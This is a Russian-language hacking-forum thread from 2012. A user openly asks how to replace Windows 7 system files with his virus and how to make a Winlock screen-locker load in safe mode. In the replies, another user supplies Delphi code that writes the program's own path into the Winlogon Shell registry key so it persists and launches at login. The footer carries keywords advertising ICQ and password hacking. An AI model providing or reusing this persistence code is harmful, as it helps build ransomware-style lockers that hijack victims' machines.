Старый 07.03.2012, 17:51   #1
alersrals
RAM 2MB
 
Аватар для alersrals
 
Регистрация: 07.03.2012
Сообщений: 2
alersrals Новичок
alersrals вне форума

По умолчанию Замена файлов на delphi


Добрый вечер дорогие форумчане. У меня к вам вопрос, как заменить программно файлы: explorer.exe, userinit.exe в Win 7 своим вирусом.
Права админа есть. Пробовал функцию DeleteFile, не срабатывает, в Google искал, про системные файлы нет ничего, может кто знает как в Win 7 x64 заменить данные файлы. И ещё как в реестре поменять путь к explorer.exe и userinit.exe .
Вот код:
Код:
   Reg:=TRegistry.Create;
   Reg.RootKey:=HKEY_LOCAL_MACHINE;
   Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
   Reg.WriteString('SHELL','C:\system.exe,' );
   Reg.CloseKey;
   Reg.Free;
Он помогает, но не грузится в безопасном режиме, почему ?
Ведь explorer.exe подменяется и там, и ещё у меня визуально в Regedit не отображается изменённая ветка, то есть:
...\Shell=explorer.exe, хотя когда запускаю AntiwinlockerCD, там пишет оболочка заражена.
Короче:
1.Как подменить данные файлы своим вирусов в Win 7 X64 и прописаться в реестре (права администратора, обход UAC не требуется)
2.Как грузить Winlock в безопасном режиме( так и не разобрался).
Прошу по возможности помочь.
Заранее спасибо
  Ответить с цитированием
Последний раз редактировалось mironich; 07.03.2012 в 19:37.
Ответ: Замена файлов на delphi
Старый 07.03.2012, 19:38   #2
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Замена файлов на delphi

Цитата:
Он помогает, но не грузится в безопасном режиме, почему ?
В безопасном ряжиме все подряд не грузиться на то он и безопасный.
  Ответить с цитированием
Ответ: Замена файлов на delphi
Старый 08.03.2012, 11:54   #3
Вадимка
RAM 64MB
 
Аватар для Вадимка
 
Регистрация: 09.02.2010
Сообщений: 94
Вадимка скоро придёт к известностиВадимка скоро придёт к известности
Вадимка вне форума
По умолчанию Ответ: Замена файлов на delphi

из за этого кода даже самые простые антивирусы будут кричать , ищи другой способ...
ну а если вдруг решишь продолжить своё творение по старому образу, то возможно тебе поможет соседняя тема про winlock
так и в безопасном грузит
Код:
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0)));
Reg.CloseKey;
Reg.Free;
  Ответить с цитированием
Последний раз редактировалось Вадимка; 08.03.2012 в 12:01.
Ответ: Замена файлов на delphi
Старый 08.03.2012, 12:16   #4
alersrals
RAM 2MB
 
Аватар для alersrals
 
Регистрация: 07.03.2012
Сообщений: 2
alersrals Новичок
alersrals вне форума
По умолчанию Ответ: Замена файлов на delphi

Цитата:
Сообщение от Вадимка Посмотреть сообщение
из за этого кода даже самые простые антивирусы будут кричать , ищи другой способ...
ну а если вдруг решишь продолжить своё творение по старому образу, то возможно тебе поможет соседняя тема про winlock
так и в безопасном грузит
Код:
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0)));
Reg.CloseKey;
Reg.Free;
Спс большое, очень благодарен
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot